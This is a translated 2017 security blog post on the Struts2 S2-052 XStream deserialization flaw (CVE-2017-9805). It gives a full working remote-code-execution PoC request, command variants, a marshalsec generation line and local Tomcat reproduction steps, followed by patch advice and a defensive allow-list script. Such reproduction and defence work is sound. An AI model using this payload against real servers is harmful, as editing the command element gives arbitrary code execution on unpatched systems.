struts2-052 vulnerability

From small beginnings come great things

Struts2 has been in the spotlight this year, with a string of high-risk vulnerabilities disclosed. I studied the S2-045 and S2-046 vulnerabilities earlier, and S2-052 appeared recently. S2-052 is somewhat less dangerous, because the environmental requirements are stricter: it only affects applications that use the Struts2 REST plugin with its XStream handler.

Disclaimer: The tools in this article are for personal testing and research only. Please delete them within 24 hours of downloading, and do not use them for commercial or illegal purposes.

s2-052 Vulnerability Introduction

S2-052 occurs when an application uses the Struts REST plugin and its XStream component deserializes an XML request body. The content of the body is not validated before deserialization, so an attacker can place a malicious object graph directly in the request, and XStream instantiates it while parsing.

Vulnerability ID: CVE-2017-9805 (S2-052)

s2-052 PoC

POST /struts2-rest-showcase/orders/3;jsessionid=A82EAA2857A1FFAF61FF24A1FBB4A3C7 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/xml
Content-Length: 2365
Referer: http://127.0.0.1:8080/struts2-rest-showcase/orders/3/edit
Cookie: JSESSIONID=A82EAA2857A1FFAF61FF24A1FBB4A3C7
Connection: close
Upgrade-Insecure-Requests: 1

<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer></ibuffer>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>

Note: the command that gets executed is the one inside the <command> element. Here it launches the macOS Calculator; on Windows it can be changed to calc.exe.

<command>
<string>
/Applications/Calculator.app/Contents/MacOS/Calculator
</string>
</command>

s2-052 Vulnerability Reproduction

Installing Tomcat on macOS

Before installing Tomcat, first check whether Java is installed on the Mac by running java -version:

java version "1.8.0_111"
Java(TM) SE Runtime Environment (build 1.8.0_111-b14)
Java HotSpot(TM) 64-Bit Server VM (build 25.111-b14, mixed mode)

Go to the Tomcat website to download it: http://tomcat.apache.org/download-80.cgi?from_33lc.com Under "Core", download the tar.gz package to your machine and extract it.
After extracting, move the folder to the /Library directory and rename it Tomcat; then set the permissions on the startup scripts:

sudo chmod 755 /Library/Tomcat/bin/*.sh

Go to the /Library/Tomcat/bin/ directory and start Tomcat:

sudo sh startup.sh

Visit: http://127.0.0.1:8080
Note: to change the Tomcat port, open /Library/Tomcat/conf/server.xml and edit the connector that listens on port 8080.

Write a script to start and stop Tomcat:
Create a file named tomcat and write the following into it:

#!/bin/bash
# Usage: tomcat start|stop|restart
case $1 in
start)
sh /Library/Tomcat/bin/startup.sh
;;
stop)
sh /Library/Tomcat/bin/shutdown.sh
;;
restart)
sh /Library/Tomcat/bin/shutdown.sh
sh /Library/Tomcat/bin/startup.sh
;;
*)
# Unknown argument: do nothing
;;
esac
exit 0

Give file permissions:

chmod 777 tomcat

Add an environment variable:

export PATH="$PATH:/Library/Tomcat/bin"

Then start or stop Tomcat with:

sudo tomcat start
sudo tomcat stop

Note: installing Tomcat on Linux and Windows is similar and is not demonstrated here.

Download and deploy the vulnerable Struts2 version

Download the last affected version, [struts-2.5.12](http://archive.apache.org/dist/struts/2.5.12/struts-2.5.12-apps.zip), from the official Struts2 site. Copy the struts2-rest-showcase.war file from its apps directory into the Tomcat webapps directory (/Library/Tomcat/webapps), restart Tomcat, and open: http://127.0.0.1:8080/struts2-rest-showcase/

Since the port monitored by burpsuite is also 8080, I changed the port of tomcat to 8081.

Constructing the POST request

You can use the PoC request above directly, or capture and replay a request yourself. To capture one, click "edit" on the page, then click submit to send the POST request, and replace the body of that POST with the PoC for this vulnerability.

Trying different PoCs

The most common PoC on the Internet pops up a calculator. However, when I tested on the Mac, the calculator pop-up failed, so I changed the PoC to write a file instead, and that test succeeded.

File-writing PoC (creates a file named vuln under /tmp/):

<command><string>/usr/bin/touch</string><string>/tmp/vuln</string></command>

Calculator pop-up PoC

Mac:
<command><string>/Applications/Calculator.app/Contents/MacOS/Calculator</string></command>
Windows:
<command><string>calc.exe</string></command>

PoC generation

java -cp marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO calc.exe > poc.txt

marshalsec-0.0.1-SNAPSHOT-all.jar can be downloaded online; no address is given here, search for it yourself.

Repair method

  • Upgrade Struts to the latest version, 2.5.13.
  • Remove the Struts REST plugin when it is not in use, or restrict it to serving normal server pages and JSON only.
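As an added example (not the post's own code, and not Struts or XStream code), the following Python pre-check applies the same idea as the type whitelist that Struts 2.5.13 turned on for the REST plugin: any XML body that names a Java class outside an approved set is rejected before it can reach the deserializer, so a gadget chain like the one shown above is stopped at the first foreign class. The allowed set and the org.demo.model.Order class are assumptions for an imaginary "orders" endpoint.

```python
# Added example: allow-list check on an XML body before XStream deserialization.
# ALLOWED_TYPES and org.demo.model.Order are assumptions for a hypothetical
# "orders" endpoint; adapt the set to the classes your REST actions really accept.
import re
import xml.etree.ElementTree as ET

ALLOWED_TYPES = {
    "java.lang.String",
    "java.util.HashMap",
    "java.util.ArrayList",
    "org.demo.model.Order",   # assumed model class of the endpoint
}

# Any dotted element name or class attribute is treated as a Java class name
# (XStream resolves both to types); '$' covers inner classes such as ImageIO$ContainsFilter.
_FQCN = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)+$")


def disallowed_types(xml_body: str) -> list:
    """Return the Java class names in xml_body that are not on the allow-list.

    A body that is not well-formed XML yields the single finding '<malformed xml>'
    so the caller rejects it instead of handing it to the deserializer.
    """
    try:
        root = ET.fromstring(xml_body)
    except ET.ParseError:
        return ["<malformed xml>"]
    found = []
    for elem in root.iter():
        for name in (elem.tag, elem.get("class")):
            if name and _FQCN.match(name) and name not in ALLOWED_TYPES and name not in found:
                found.append(name)
    return found


def is_safe(xml_body: str) -> bool:
    """True only when every referenced type is allow-listed."""
    return not disallowed_types(xml_body)


# Constructed sample bodies for a stand-alone run (not captured traffic).
BENIGN = "<order class='org.demo.model.Order'><clientName>Bob</clientName><amount>3</amount></order>"
GADGET = ("<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags>"
          "<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>"
          "<next class='java.lang.ProcessBuilder'/></value>"
          "</jdk.nashorn.internal.objects.NativeString></entry></map>")

if __name__ == "__main__":
    print("benign safe:", is_safe(BENIGN))
    print("gadget findings:", disallowed_types(GADGET))
```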

Python verification script

https://github.com/ysrc/xunfeng/commit/f9ae69fe176c8bca622831e126cd94414ebe26f6?from=timeline&isappinstalled=0

Reference articles

http://www.freebuf.com/vuls/146718.html
https://www.t00ls.net/thread-41942-1-1.html
http://www.imooc.com/article/6453
https://github.com/jas502n/St2-052/blob/master/README.md

Related posts

[struts2-046 vulnerability](http://thief.one/2017/03/21/Struts2-046%E6%BC%8F%E6%B4%9E/)
[struts2-045 vulnerability](http://thief.one/2017/03/07/Struts2-045%E6%BC%8F%E6%B4%9E/)
[struts2 vulnerability poc summary](http://thief.one/2017/03/13/Struts2%E6%BC%8F%E6%B4%9EPOC%E6%B1%87%E6%80%BB/)

Title: struts2-052 vulnerability

Author: nmask

Published: 2017-09-06 16:09

Last updated: 2019-07-11 18:07

Original link: https://thief.one/2017/09/06/1/en/

License: Attribution-NonCommercial-NoDerivatives 4.0 International. Please keep the original link and author when reposting.
